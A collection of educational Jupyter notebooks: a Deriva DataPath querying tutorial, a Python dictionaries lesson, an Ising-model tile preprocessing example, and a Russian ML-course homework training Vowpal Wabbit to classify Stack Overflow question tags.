## Implicit DataPaths
**Proceed with caution**
For compactness, `Table` objects (and `TableAlias` objects) provide `DataPath`-like methods. E.g., `link(...)`, `filter(...)`, and `entities(...)`, which will implicitly create `DataPath`s rooted at the table and return the newly created path. These operations `return` the new `DataPath` rather than mutating the `Table` (or `TableAlias`) objects.
```
entities = dataset.filter(dataset.released == True).entities()
len(entities)
```
### DataPath-like methods
The `DataPath`-like methods on `Table`s are essentially "wrapper" functions over the implicitly generated `DataPath` rooted at the `Table` instance. The wrappers include, `link(...)`, `filter(...)`, `entities(...)`, `attributes(...)`, `aggregates(...)`, and `groupby(...)`.
## Attribute Examples
### Example: selecting all columns of a table instance
Passing a table (or table instance) object to the `attributes(...)` method will project all (i.e., `*`) of its attributes.
```
path = dataset.alias('D').path
path.link(experiment).link(replicate)
results = path.attributes(path.D)
print(len(results))
print(results.uri)
```
It is important to remember that the `attributes(...)` method returns a result set based on the entity type of the last elmenent of the path. In this example that means the number of results will be determined by the number of unique rows in the replicate table instance in the path created above, as the last link method used the replicate table.
### Example: selecting from multiple table instances
More than one table instance may be selected in this manner and it can be mixed and matched with columns from other tables instances.
```
results = path.attributes(path.D,
path.experiment.experiment_type,
path.replicate)
print(len(results))
print(results.uri)
```
If you want to base the results on a different entity, you can introduce a table instance alias into the end of the path, before calling the attributes function. In this case, even though we are asking for the same attributes, we are getting the set of datasets, not the set of replicates. Also, since we are including the attributes from dataset in our query, we know that we will not be seeing any duplicate rows.
```
results = path.D.attributes(path.D,
path.experiment.experiment_type,
path.replicate)
print(len(results))
print(results.uri)
```
## Filtering Examples
### Example: filter on `null` attribute
To test for a `null` attribute value, do an equality comparison against the `None` identity.
```
path = dataset.link(experiment).filter(experiment.molecule_type == None)
print(path.uri)
print(len(path.entities()))
```
### Example: advanced text filters
Deriva supports advanced text filters for regular expressions (`regexp`), case-instansitive regexp (`ciregexp`), and text search (`ts`). You may have to review your text and full-text indexes in your ERMrest catalog before using these features.
```
path = dataset.filter(dataset.description.ciregexp('palate'))
print(path.uri)
print(len(path.entities()))
```
### Example: negate a filter
Use the "inverse" ('`~`') operator to negate a filter. Negation works against simple comparison filters as demonstrated above as well as on logical operators to be discussed next. You must wrap the comparison or logical operators in an extra parens to use the negate operation, e.g., "`~ (...)`".
```
path = dataset.filter( ~ (dataset.description.ciregexp('palate')) )
print(path.uri)
print(len(path.entities()))
```
### Example: filters with logical operators
This example shows how to combine two comparisons with a conjuncting (i.e., `and` operator). Because Python's logical-and (`and`) keyword cannot be overloaded, we instead overload the bitwise-and (`&`) operator. This approach has become customary among many similar data access libraries.
```
path = dataset.link(biosample).filter(
((biosample.species == 'NCBITAXON:10090') & (biosample.anatomy == 'UBERON:0002490')))
print(path.uri)
DataFrame(path.entities())
```
### Example: combine conjunction and disjunctions in filters
Similar to the prior example, the filters allow combining of conjunctive and disjunctive operators. Like the bitwise-and operator, we also overload the bitwise-or (` | `) operator because the logical-or (`or`) operatar cannot be overloaded.
```
path = dataset.link(biosample).filter(
((biosample.species == 'NCBITAXON:10090') & (biosample.anatomy == 'UBERON:0002490')) |
((biosample.specimen == 'FACEBASE:1-4GNR') & (biosample.stage == 'FACEBASE:1-4GJA')))
print(path.uri)
DataFrame(path.entities())
```
### Example: filtering at different stages of the path
Filtering a path does not have to be done at the end of a path. In fact, the initial intention of the ERMrest URI was to mimick "RESTful" semantics where a RESTful "resource" is identified, then filtered, then a "sub-resource" is identified, and then filtered, and so on.
```
path = dataset.filter(dataset.release_date >= '2017-01-01') \
.link(experiment).filter(experiment.experiment_type == 'OBI:0001271') \
.link(replicate).filter(replicate.bioreplicate_number == 1)
print(path.uri)
DataFrame(path.entities())
```
## Linking Examples
### Example: explicit column links
Up until now, the examples have shown how to link entities via _implicit_ join predicates. That is, we knew there existed a foriegn key reference constraint between foreign keys of one entity and keys of another entity. We needed only to ask ERMrest to link the entities in order to get the linked set.
The problem with implicit links is that it become _ambiguous_ if there are more than one foreign key reference between tables. To support these situations, ERMrest and the `DataPath`'s `link(...)` method can specify the columns to use for the link condition, explicitly.
The structure of the `on` clause is:
- an equality comparison operation where
- the _left_ operand is a column of the _left_ table instance which is also the path _context_ before the link method is called, and
- the _right_ operand is a column of the _right_ table instance which is the table _to be linked_ to the path.
```
path = dataset.link(experiment, on=(dataset.RID==experiment.dataset))
print(path.uri)
```
**IMPORTANT** Not all tables are related by foreign key references. ERMrest does not allow arbitrary relational joins. Tables must be related by a foreign key reference in order to link them in a data path.
```
DataFrame(path.entities().fetch(limit=3))
```
### Example: explicit column links combined with table aliasing
As usual, table instances are generated automatically unless we provide a table alias.
```
path = dataset.link(biosample.alias('S'), on=(dataset.RID==biosample.dataset))
print(path.uri)
```
Notice that we cannot use the alias right away in the `on` clause because it was not _bound_ to the path until _after_ the `link(...)` operation was performed.
### Example: links with "outer join" semantics
Up until now, the examples have shown "`link`s" with _inner join_ semantics. _Outer join_ semantics can be expressed as part of explicit column links, and _only_ when using explicit column links.
The `link(...)` method accepts a "`join_type`" parameter, i.e., "`.link(... join_type=TYPE)`", where _TYPE_ may be `'left'`, `'right'`, `'full'`, and defaults to `''` which indicates inner join type.
By '`left`' outer joining in the link from `'dataset'` to `'experiment`' and to `'biosample'`, and then reseting the context of the path to `'dataset'`, the following path gives us a reference to `'dataset'` entities that _whether or not_ they have any experiments or biosamples.
```
# Notice in between `link`s that we have to reset the context back to `dataset` so that the
# second join is also left joined from the dataset table instance.
path = dataset.link(experiment.alias('E'), on=dataset.RID==experiment.dataset, join_type='left') \
.dataset \
.link(biosample.alias('S'), on=dataset.RID==biosample.dataset, join_type='left') \
# Notice that we have to perform the attribute fetch from the context of the `path.dataset`
# table instance.
results = path.dataset.attributes(path.dataset.RID,
path.dataset.title,
path.E.experiment_type,
path.S.species)
print(results.uri)
len(results)
```
We can see above that we have a full set of datasets _whether or not_ they have any experiments with biosamples. For further evidence, we can convert to a DataFrame and look at a slice of its entries. Note that the biosample's 'species' and 'stage' attributes do not exist for some results (i.e., `NaN`) because those attributes did not exist for the join condition.
```
DataFrame(results)[:10]
```
## Faceting Examples
You may have noticed that in the examples above, the 'species' and 'experiment_type' attributes are identifiers ('CURIE's to be precise). We may want to construct filters on our datasets based on these categories. This can be used for "faceted search" modes and can be useful even within the context of programmatic access to data in the catalog.
### Example: faceting on "related" tables
Let's say we want to find all of the biosamples in our catalog where their species are 'Mus musculus' and their age stage are 'E10.5'.
We need to extend our understanding of the data model with the following tables that are related to '`biosample`'.
- `isa.biosample.species -> vocab.species`: the biosample table has a foreign key reference to the '`species`' table.
- `isa.biosample.stage -> vocab.stage`: the biosample table has a foreign key reference to the '`stage`' table.
We may say that `species` and `stage` are _related_ to the `biosample` table in the sense that `biosample` has a direct foreign key relationship from it to them.
For convenience, we will get local variables for the species and stage tables.
```
species = pb.vocab.species
stage = pb.vocab.stage
```
First, let's link samples with species and filter on the term "Mus musculus" (i.e., "mouse").
```
# Here we have to use the container `columns_definitions` because `name` is reserved
path = biosample.alias('S').link(species).filter(species.column_definitions['name'] == 'Mus musculus')
print(path.uri)
```
Now the _context_ of the path is the `species` table instance, but we need to link from the `biosample` to the age `stage` table.
To do so, we reference the `biosample` table instance, in this case using its alias `S`. Then we link off of that table instance which updates the `path` itself.
```
path.S.link(stage).filter(stage.column_definitions['name'] == 'E10.5')
print(path.uri)
```
Now, the path _context_ is the age `stage` table instance, but we wanted to get the entities for the `biosample` table. To do so, again we will reference the `biosample` table instance by the alias `S` we used. From there, we will call the `entities(...)` method to get the samples.
```
results = path.S.attributes(path.S.RID,
path.S.collection_date,
path.species.column_definitions['name'].alias('species'),
path.species.column_definitions['uri'].alias('species_uri'),
path.stage.column_definitions['name'].alias('stage'),
path.stage.column_definitions['uri'].alias('stage_uri'))
print(results.uri)
DataFrame(results)
```
## Grouping Examples
Now support you would like to aggregate all of the vocabulary terms associated with a Dataset. Here, we examine what happens when you have a model such that `dataset <- dataset_VOCAB -> VOCAB` where `VOCAB` is a placeholder for a table that includes a vocabulary term set. These tables typically have a `name` column for the human-readable preferred label to go along with the formal URI or CURIE of the concept class.
```
# We need to import the `ArrayD` aggregate function for this example.
from deriva.core.datapath import ArrayD
# For convenience, get python objects for the additional tables.
dataset_organism = pb.isa.dataset_organism
dataset_experiment_type = pb.isa.dataset_experiment_type
species = pb.vocab.species
experiment_type = pb.vocab.experiment_type
# Start by doing a couple left outer joins on the dataset-term association tables, then link
# (i.e., inner join) the associated vocabulary term table, then reset the context back to the
# dataset table.
path = dataset.link(dataset_organism, on=dataset.id==dataset_organism.dataset_id, join_type='left') \
.link(species) \
.dataset \
.link(dataset_experiment_type, on=dataset.id==dataset_experiment_type.dataset_id, join_type='left') \
.link(experiment_type)
# Again, notice that we reset the context to the `dataset` table alias so that we will retrieve
# dataset entities based on the groupings to be defined next. For the groupby key we will use the
# dataset.RID, but for this example any primary key would work. Then we will get aggregate arrays
# of the linked vocabulary tables.
results = path.dataset.groupby(dataset.RID).attributes(
dataset.title,
ArrayD(path.species.column_definitions['name']).alias('species'),
ArrayD(path.experiment_type.column_definitions['name']).alias('experiment_type')
)
#results = path.dataset.entities()
print(results.uri)
print(len(results))
DataFrame(results.fetch(limit=20))
```
| github_jupyter |
# Dictionaries
---
[Watch a walk-through of this lesson on YouTube]()
## Questions:
- How can I organize data to store values associated with labels?
- How do I work with such data structures?
## Learning Objectives:
- Be able to store data in dictionaries
- Be able to retrieve specific items from dictionaries
---
## Dictionaries are mappings
- Python provides a valuable data type called the **dictionary** (often abbreviated as "dict")
- Dictionaries are *collections* — Python data types that store multiple values — like lists or strings
- However, dictionaries are *mappings*. Like a traditional dictionary that contains a word, followed by a definition, dictionaries are pairings of **keys** and **values**
- A dictionary can be defined using curly braces that specify key-value mappings using the colon (`:`)
- For example, the following defines a dictionary with four keys (`First Name`, `Last Name`, etc.), each with an associated value:
~~~python
my_info = {'First Name':'Annikki',
'Last Name':'Bogdana',
'Age':15,
'Height':1.66}
~~~
- Like lists, dictionaries can contain a mixture of data types.
- Dictionary **keys** must be an *immutable* type, such as a string or number (int or float). This is because dictionaries are organized by keys, and once a key is defined, it cannot be changed.
- Dictionary **values** can be any type.
The values in a dictionary are accessed using their keys inside square brackets:
~~~python
my_info['First Name']
~~~
## Why Dictionaries?
- Dictionaries provide a convenient way for labelling data. For example, in the previous lesson on lists, we used an example of a list of life expectancies for a country (Canada) for different years:
~~~python
life_exp = [48.1, 56.6, 64.0, 71.0, 75.2, 79.2]
~~~
- One limitation of using list like this, is that we don't know what years the values are associated with. For example, in what year was 48.1 the average life expectancy?
- Dictionaries solve this problem, because we can use the keys to label the data. For example define the following dictionary in which keys indicated years, and values are life expectancies:
~~~python
life_exp = {1900:48.1, 1920:56.6, 1940:64.0, 1960:71.0, 1980:75.2, 2000:79.2}
~~~
- In defining a dictionary, we use **curly braces {}**
- We associate keys and values with a colon **`:`**
- Now we can see the life expectancy associated with a given year like so:
~~~python
life_exp[1940]
~~~
- What happens if we ask for a key that doesn't exist?
~~~python
life_exp[2021]
~~~
- We get a specific type of error called a KeyError, which tells us that the key isn't defined
## Dictionaries are mutable
- We previously discussed the difference between *immutable* types like strings — whose contents cannot be changed — and *mutable* types like lists — which can be changed. Dictionaries are mutable.
- This means we can:
- add new key:value pairs after the dictionary is first defined, and
- modify the values associated with existing keys
- For example, we can add a new key:value pair by using the dict name plus square brackets to specify a new key, followed by `=` to assign the value to this key:
~~~python
life_exp[2020] = 83.2
print(life_exp)
~~~
- We can also change the value for an existing key in the same way. In the example above we assigned the wrong value to 2020; it should be 82.3 not 83.2. So we can fix it like this:
~~~python
life_exp[2020] = 82.3
print(life_exp)
~~~
- Note that Python doesn't warn you if you're overwriting a value associated with an existing key.
### Dictionary keys cannot be renamed
- Although dictionaries are mutable, we can't rename dictionary *keys*. However, we can delete existing entries and create new ones if we need to.
- For example, below we add a life expectancy value for the year 2040, but we mistakenly make the key a string instead of an integer like the other, existing keys:
~~~python
life_exp['2040'] = 85.1
print(life_exp)
~~~
- We can add another entry using the correct (integer) key, but this doesn't delete the old entry:
~~~python
life_exp[2040] = 85.1
print(life_exp)
~~~
- Alternatively, rather than manually entering the new value manually, we can copy it from the value corresponding to the original (incorrect) key:
~~~python
life_exp[2040] = life_exp['2040']
print(life_exp)
~~~
- Whether we manually enter a new key:value pair, or copy a value from an existing dictionary entry, we still retain the original dictionary entry (in this case, `'2040'`)
### Removing dictionary entries
- We can remove a dictionary entry with the **`del`** statement. `del` is a Python *statement* (not a function or method), so it is followed by a space rather than parentheses:
~~~python
del life_exp['2040']
print(life_exp)
~~~
- We can alternatively remove a dictionary item using the **`.pop()`** method, as we saw last time for lists.
- The key for the dictionary entry you wish to delete is the argument you pass to `.pop()`
- In this example we first create an erroneous entry, then remove it with `.pop()`:
```python
# Create incorrect entry
life_exp[200] = 79.2
print(life_exp)
# Remove incorrect entry
life_exp.pop(200)
print(life_exp)
```
## Dictionaries are unordered
- Both strings and lists are *ordered* — the items exist in a string or list in a specific order. This is why we can use integers to index string or list items based on their position
- Dictionaries, in contrast, are *unordered*. Because they are not ordered, you can't access values using numerical indexing, only by their keys. For example, this will fail:
~~~python
life_exp[0]
~~~
- The code above results in a `KeyError`, because Python interprets what's in the square brackets as a dictionary key, not a sequential index. This makes sense, since dictionary keys can be integers.
## Dictionaries have properties
- Like other Python collections, dictionaries have a length property, which is the number of key:value pairs:
~~~python
len(life_exp)
~~~
## Viewing all the keys or values in a dictionary
- You can view the entire set of keys in a dictionary like this:
~~~python
life_exp.keys()
~~~
- Likewise, you can view all of the values using `.values()`:
~~~python
life_exp.values()
~~~
- You can also view both the keys and values at once, using `.items()`:
~~~python
life_exp.items()
~~~
- The output of `.items()` is more complex than just asking Python to print the dictionary, but it's organized in a way that will be useful in later lessons, for example if you want to systematically do the same thing to each item in a a dictionary.
**Skill-Testing Question:**
What Python type are the results of the `.keys()` and `.values()` methods?
## Finding a key in a dictionary
- If your dictionary is very large, it may not be feasible to visually scan through all the entries to determine if a particular key is present. You can use the `in` statement to check whether a key is in a dictionary:
~~~python
print(1900 in life_exp)
print(1800 in life_exp)
~~~
## Dictionary values can be any type
- While dictionary keys must be an immutable type, such as strings or numbers, values can be any type — including lists, or other dictionaries.
- For example, here we create a dictionary in which each key is a country name, and the value is a list of life expectancies for different years:
~~~python
intl_life_exp = {'Canada':[48.1, 56.6, 64.0, 71.0, 75.2, 79.2],
'Denmark':[51.3, 57.5, 66.1, 72.0, 74.2, 77.0],
'Egypt':[32.7, 32.6, 33.8, 46.9, 58.0, 68.7]
}
intl_life_exp['Egypt']
~~~
### Nested indexing
- `intl_life_exp` is an example of *nesting*, which we saw previously in the lesson on lists. Each dictionary entry's value is a list, which is "nested" inside the dictionary.
- Since we can index entries in a list, we can use a sequence of specifiers to access a particular element within the list for a specific country's dictionary entry:
~~~python
intl_life_exp['Denmark'][1]
~~~
### Nested dictionaries
- Using lists in the above example has the same limitation talked about at the start of this lesson: we don't know what years correspond to the values in each list.
- Using a dictionary of dictionaries solves this problem:
~~~python
intl_life_exp = {'Canada':{1900:48.1, 1920:56.6, 1940:64.0, 1960:71.0, 1980:75.2, 2000:79.2},
'Denmark':{1900:51.3, 1920:57.5, 1940:66.1},
'Egypt':{1900:32.7, 1920:32.6, 1940:33.8, 1980:58.0}
}
intl_life_exp['Egypt']
~~~
- Note that each nested dictionary is independent of the others, so you don't need ot have the same keys in each dictionary.
- We can now obtain values for specific years, within specific countries, using a sequence of keys
- The order of keys goes from teh outside in as you move from left to right, so `'Denmark'` comes before the year we want to access for Denmark
~~~python
intl_life_exp['Denmark'][1940]
~~~
---
## Exercises
### Practice with dictionaries
- Create a dictionary called `weekdays` in which the keys are the names of the days of the week from Monday to Friday (not including weekends), and the values are the dates of the days of the week for this week (e.g., if today is Monday, Sept 20, then your value for `Monday` would be `20`)
- Using the `weekdays` list you created, print the value for `Wednesday`
### Sorting dictionaries
- Although dictionaries are not stored in an ordered fashion, it is possible to view a sorted list of dictionary keys using the `sorted()` function we learned in the previous lesson on lists. Try printing the sorted keys for `weekdays`
### Extending dictionaries
- Add key:value pairs for the weekend days to `weekdays`
### Deleting dictionary entries
- remove the entry for `Wednesday` from the `weekdays` dictionary
- Remove the entry for 1980 from the `intl_life_exp` dictionary entry for Canada
### Checking dictionaries
- Check if the year 1940 is a key in the entry for Denmark in the `intl_life_exp` dictionary
- Check if the year 2000 is a key in the entry for Egypt in the `intl_life_exp` dictionary
---
## Summary of Key Points
- Dictionaries are a special type of collection called *mappings*
- Each dictionary entry is specified as a key:value pair
- Key:value pairs are assigned to variable names within curly braces: `{}`
- Keys must be immutable types, such as strings or numbers.
- However, dictionary values can be any Python type, including lists or other dictionaries
- Dictionaries are mutable, in that one can add or delete entries, or change the value of an entry
- You can add a new dictionary entry through assignment
- However, dictionary keys cannot be renamed. Instead, you must delete the old key:value pair and create a new one
- You can delete a dictionary entry using wither the `del` statement or the `.pop()` method
- Dictionaries are unordered, so you cannot access an entry based on its serial (sequential) position the way you can entries in a list
- Instead, you access values based on their keys
- The length of a dictionary is the number of key:value pairs it contains
- You can see a list of all dictionary keys or values using the `.keys()` and `.values()` methods, respectively
| github_jupyter |
# 0. Preprocessing
An initial step of turning an example into weights (energy and interaction terms for the Ising model), so that these can be uses in the following Hamiltionan:
$$ H = \sum_{x, y} \sum_{i} a_i s_i^{(x, y)} + \sum_{x,y} \sum_{x', y'} \sum_{i,j} b_{ij} s_i^{(x, y)} s_j^{(x', y')} [ \text{if } (x, y) \text{ neighbors } (x', y')]$$
```
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from collections import Counter
# it does not need to be square or anything
n_tiles = 4
pattern_sample = np.array([
[2, 0, 1, 0, 0],
[0, 0, 3, 3, 3],
[3, 3, 3, 1, 0],
[0, 1, 0, 0, 2]
])
fig, ax = plt.subplots(1, 1, figsize=(5,4))
tile_names = ['grass', 'tree', 'water', 'road']
tile_colors = ['#0c0', '#050', '#00c', '#cc6']
sns.heatmap(pattern_sample, cmap=tile_colors, linewidth=0.1, linecolor='black', ax=ax)
colorbar = ax.collections[0].colorbar
M = pattern_sample.max().max()
colorbar.set_ticks([(i + 0.5) * (n_tiles - 1) / n_tiles for i in range(n_tiles)])
colorbar.set_ticklabels(tile_names)
plt.show()
counts = Counter(pattern_sample.flatten())
counts.most_common()
total_tiles = len(pattern_sample.flatten())
total_tiles
tile_probs = np.array([counts[i] / total_tiles for i in range(n_tiles)])
tile_probs
# negative log-likelihood
# higher value means something is LESS likely (so it will get a higher energy/cost function)
tile_nll = - np.log(tile_probs)
tile_nll
coincidences = np.zeros((n_tiles, n_tiles))
height, width = pattern_sample.shape
# horizontal coincidences
for x in range(width - 1):
for y in range(height):
tile1 = pattern_sample[y, x]
tile2 = pattern_sample[y, x + 1]
if tile2 < tile1:
tile1, tile2 = tile2, tile1
coincidences[tile1, tile2] += 1
for x in range(width):
for y in range(height - 1):
tile1 = pattern_sample[y, x]
tile2 = pattern_sample[y + 1, x]
if tile2 < tile1:
tile1, tile2 = tile2, tile1
coincidences[tile1, tile2] += 1
# we use onlny diagonall and the upper triange (convention, nothing more)
coincidences
coincidence_prob = coincidences / coincidences.sum()
sns.heatmap(coincidence_prob)
# impossible combinations have inf energy
coincidence_nll = -np.log(coincidence_prob)
coincidence_nll
# if we want to avoid infinities, we can add some epsilon to probabilities
# or even better: add 0.5 to counts
# (it is arbitrary, but 0.5 apprears a lot in statistics and quantum, as the "base count")
noise = 0.5
concidence_nll_noise = -np.log((coincidences + noise) / (coincidences + noise).sum())
sns.heatmap(concidence_nll_noise)
```
| github_jupyter |
<center>
<img src="../../img/ods_stickers.jpg">
## Открытый курс по машинному обучению. Сессия №3
<center>Автор материала: программист-исследователь Mail.Ru Group Юрий Кашницкий
# <center> Домашнее задание № 8
## <center> Vowpal Wabbit в задаче классификации тегов вопросов на Stackoverflow
## План
1. Введение
2. Описание данных
3. Предобработка данных
4. Обучение и проверка моделей
5. Заключение
### 1. Введение
В этом задании вы будете делать примерно то же, что я каждую неделю – в Mail.Ru Group: обучать модели на выборке в несколько гигабайт. Задание можно выполнить и на Windows с Python, но я рекомендую поработать под \*NIX-системой (например, через Docker) и активно использовать язык bash.
Немного снобизма (простите, но правда): если вы захотите работать в лучших компаниях мира в области ML, вам все равно понадобится опыт работы с bash под UNIX.
[Веб-форма](https://docs.google.com/forms/d/1VaxYXnmbpeP185qPk2_V_BzbeduVUVyTdLPQwSCxDGA/edit) для ответов.
Для выполнения задания понадобится установленный Vowpal Wabbit (уже есть в докер-контейнере курса, см. инструкцию в Wiki [репозитория](https://github.com/Yorko/mlcourse_open) нашего курса) и примерно 70 Гб дискового пространства. Я тестировал решение не на каком-то суперкомпе, а на Macbook Pro 2015 (8 ядер, 16 Гб памяти), и самая тяжеловесная модель обучалась около 12 минут, так что задание реально выполнить и с простым железом. Но если вы планируете когда-либо арендовать сервера Amazon, можно попробовать это сделать уже сейчас.
Материалы в помощь:
- интерактивный [тьюториал](https://www.codecademy.com/en/courses/learn-the-command-line/lessons/environment/exercises/bash-profile) CodeAcademy по утилитам командной строки UNIX (примерно на час-полтора)
- [статья](https://habrahabr.ru/post/280562/) про то, как арендовать на Amazon машину (еще раз: это не обязательно для выполнения задания, но будет хорошим опытом, если вы это делаете впервые)
### 2. Описание данных
Имеются 10 Гб вопросов со StackOverflow – [скачайте](https://drive.google.com/file/d/1ZU4J3KhJDrHVMj48fROFcTsTZKorPGlG/view) и распакуйте архив.
Формат данных простой:<br>
<center>*текст вопроса* (слова через пробел) TAB *теги вопроса* (через пробел)
Здесь TAB – это символ табуляции.
Пример первой записи в выборке:
```
!head -1 hw8_data/stackoverflow.10kk.tsv
!head -1 hw8_data/stackoverflow_10mln.tsv
```
Здесь у нас текст вопроса, затем табуляция и теги вопроса: *css, css3* и *css-selectors*. Всего в выборке таких вопросов 10 миллионов.
```
%%time
!wc -l stackoverflow_10mln.tsv
%%time
!wc -l hw8_data/stackoverflow.10kk.tsv
```
Обратите внимание на то, что такие данные я уже не хочу загружать в оперативную память и, пока можно, буду пользоваться эффективными утилитами UNIX – head, tail, wc, cat, cut и прочими.
### 3. Предобработка данных
Давайте выберем в наших данных все вопросы с тегами *javascript, java, python, ruby, php, c++, c#, go, scala* и *swift* и подготовим обучающую выборку в формате Vowpal Wabbit. Будем решать задачу 10-классовой классификации вопросов по перечисленным тегам.
Вообще, как мы видим, у каждого вопроса может быть несколько тегов, но мы упростим себе задачу и будем у каждого вопроса выбирать один из перечисленных тегов либо игнорировать вопрос, если таковых тегов нет.
Но вообще VW поддерживает multilabel classification (аргумент --multilabel_oaa).
<br>
<br>
Реализуйте в виде отдельного файла `preprocess.py` код для подготовки данных. Он должен отобрать строки, в которых есть перечисленные теги, и переписать их в отдельный файл в формат Vowpal Wabbit. Детали:
- скрипт должен работать с аргументами командной строки: с путями к файлам на входе и на выходе
- строки обрабатываются по одной (можно использовать tqdm для подсчета числа итераций)
- если табуляций в строке нет или их больше одной, считаем строку поврежденной и пропускаем
- в противном случае смотрим, сколько в строке тегов из списка *javascript, java, python, ruby, php, c++, c#, go, scala* и *swift*. Если ровно один, то записываем строку в выходной файл в формате VW: `label | text`, где `label` – число от 1 до 10 (1 - *javascript*, ... 10 – *swift*). Пропускаем те строки, где интересующих тегов больше или меньше одного
- из текста вопроса надо выкинуть двоеточия и вертикальные палки, если они есть – в VW это спецсимволы
```
import os
from tqdm import tqdm
from time import time
import numpy as np
from sklearn.metrics import accuracy_score
```
Должно получиться вот такое число строк – 4389054. Как видите, 10 Гб у меня обработались примерно за полторы минуты.
```
!python preprocess.py hw8_data/stackoverflow.10kk.tsv hw8_data/stackoverflow.vw
!wc -l hw8_data/stack.vw
!python preprocess.py stackoverflow_10mln.tsv stackoverflow.vw
```
Поделите выборку на обучающую, проверочную и тестовую части в равной пропорции - по 1463018 в каждый файл. Перемешивать не надо, первые 1463018 строк должны пойти в обучающую часть `stackoverflow_train.vw`, последние 1463018 – в тестовую `stackoverflow_test.vw`, оставшиеся – в проверочную `stackoverflow_valid.vw`.
Также сохраните векторы ответов для проверочной и тестовой выборки в отдельные файлы `stackoverflow_valid_labels.txt` и `stackoverflow_test_labels.txt`.
Тут вам помогут утилиты `head`, `tail`, `split`, `cat` и `cut`.
```
#!head -1463018 hw8_data/stackoverflow.vw > hw8_data/stackoverflow_train.vw
#!tail -1463018 hw8_data/stackoverflow.vw > hw8_data/stackoverflow_test.vw
#!tail -n+1463018 hw8_data/stackoverflow.vw | head -n+1463018 > hw8_data/stackoverflow_valid.vw
#!split -l 1463018 hw8_data/stackoverflow.vw hw8_data/stack
!mv hw8_data/stackaa hw8_data/stack_train.vw
!mv hw8_data/stackab hw8_data/stack_valid.vw
!mv hw8_data/stackac hw8_data/stack_test.vw
!cut -d '|' -f 1 hw8_data/stack_valid.vw > hw8_data/stack_valid_labels.txt
!cut -d '|' -f 1 hw8_data/stack_test.vw > hw8_data/stack_test_labels.txt
```
### 4. Обучение и проверка моделей
Обучите Vowpal Wabbit на выборке `stackoverflow_train.vw` 9 раз, перебирая параметры passes (1,3,5), ngram (1,2,3).
Остальные параметры укажите следующие: bit_precision=28 и seed=17. Также скажите VW, что это 10-классовая задача.
Проверяйте долю правильных ответов на выборке `stackoverflow_valid.vw`. Выберите лучшую модель и проверьте качество на выборке `stackoverflow_test.vw`.
```
%%time
for p in [1,3,5]:
for n in [1,2,3]:
!vw --oaa 10 \
-d hw8_data/stack_train.vw \
--loss_function squared \
--passes {p} \
--ngram {n} \
-f hw8_data/stack_model_{p}_{n}.vw \
--bit_precision 28 \
--random_seed 17 \
--quiet \
--c
print ('stack_model_{}_{}.vw is ready'.format(p,n))
%%time
for p in [1,3,5]:
for n in [1,2,3]:
!vw -i hw8_data/stack_model_{p}_{n}.vw \
-t -d hw8_data/stack_valid.vw \
-p hw8_data/stack_valid_pred_{p}_{n}.txt \
--quiet
print ('stack_valid_pred_{}_{}.txt is ready'.format(p,n))
%%time
with open('hw8_data/stack_valid_labels.txt') as valid_labels_file :
valid_labels = [float(label) for label in valid_labels_file.readlines()]
scores=[]
best_valid_score=0
for p in [1,3,5]:
for n in [1,2,3]:
with open('hw8_data/stack_valid_pred_'+str(p)+'_'+str(n)+'.txt') as pred_file:
valid_pred = [float(label) for label in pred_file.readlines()]
#if (n,p) in [(2,3),(3,5),(2,1),(1,1)]:
acc_score=accuracy_score(valid_labels, valid_pred)
scores.append(((n,p),acc_score))
if acc_score>best_valid_score:
best_valid_score=acc_score
print(n,p,round(acc_score,4))
scores.sort(key=lambda tup: tup[1],reverse=True)
print(scores)
best_valid_scoret_valid_score
```
<font color='red'> Вопрос 1.</font> Какое сочетание параметров дает наибольшую долю правильных ответов на проверочной выборке `stackoverflow_valid.vw`?
- Биграммы и 3 прохода по выборке
- Триграммы и 5 проходов по выборке
- **Биграммы и 1 проход по выборке** <--
- Униграммы и 1 проход по выборке
Проверьте лучшую (по доле правильных ответов на валидации) модель на тестовой выборке.
```
!vw -i hw8_data/stack_model_1_2.vw \
-t -d hw8_data/stack_test.vw \
-p hw8_data/stack_test_pred_1_2.txt \
--quiet
%%time
with open('hw8_data/stack_test_labels.txt') as test_labels_file :
test_labels = [float(label) for label in test_labels_file.readlines()]
with open('hw8_data/stack_test_pred_1_2.txt') as pred_file:
test_pred = [float(label) for label in pred_file.readlines()]
test_acc_score=accuracy_score(test_labels, test_pred)
print(round(test_acc_score,4))
100*round(test_acc_score,4)-100*round(best_valid_score,4)
```
<font color='red'> Вопрос 2.</font> Как соотносятся доли правильных ответов лучшей (по доле правильных ответов на валидации) модели на проверочной и на тестовой выборках? (здесь % – это процентный пункт, т.е., скажем, снижение с 50% до 40% – это на 10%, а не 20%).
- На тестовой ниже примерно на 2%
- На тестовой ниже примерно на 3%
- **Результаты почти одинаковы – отличаются меньше чем на 0.5%** <--
Обучите VW с параметрами, подобранными на проверочной выборке, теперь на объединении обучающей и проверочной выборок. Посчитайте долю правильных ответов на тестовой выборке.
```
!cat hw8_data/stack_train.vw hw8_data/stack_valid.vw > hw8_data/stack_merged.vw
%%time
!vw --oaa 10 \
-d hw8_data/stack_merged.vw \
--loss_function squared \
--passes 1 \
--ngram 2 \
-f hw8_data/stack_model_merged.vw \
--bit_precision 28 \
--random_seed 17 \
--quiet \
-c
%%time
!vw -i hw8_data/stack_model_merged.vw \
-t -d hw8_data/stack_test.vw \
-p hw8_data/stack_test_pred_merged.txt \
--quiet
%%time
with open('hw8_data/stack_test_labels.txt') as test_labels_file :
test_labels = [float(label) for label in test_labels_file.readlines()]
with open('hw8_data/stack_test_pred_merged.txt') as pred_file:
test_pred = [float(label) for label in pred_file.readlines()]
merged_acc_score=accuracy_score(test_labels, test_pred)
print(round(merged_acc_score,4))
100*round(merged_acc_score,4)-100*round(test_acc_score,4)
```
<font color='red'> Вопрос 3.</font> На сколько процентных пунктов повысилась доля правильных ответов модели после обучения на вдвое большей выборке (обучающая `stackoverflow_train.vw` + проверочная `stackoverflow_valid.vw`) по сравнению с моделью, обученной только на `stackoverflow_train.vw`?
- 0.1%
- **0.4%** <--
- 0.8%
- 1.2%
### 5. Заключение
В этом задании мы только познакомились с Vowpal Wabbit. Что еще можно попробовать:
- Классификация с несколькими ответами (multilabel classification, аргумент `multilabel_oaa`) – формат данных тут как раз под такую задачу
- Настройка параметров VW с hyperopt, авторы библиотеки утверждают, что качество должно сильно зависеть от параметров изменения шага градиентного спуска (`initial_t` и `power_t`). Также можно потестировать разные функции потерь – обучать логистическую регресиию или линейный SVM
- Познакомиться с факторизационными машинами и их реализацией в VW (аргумент `lrq`)
| github_jupyter |
<h1> Preprocessing using tf.transform and Dataflow </h1>
This notebook illustrates:
<ol>
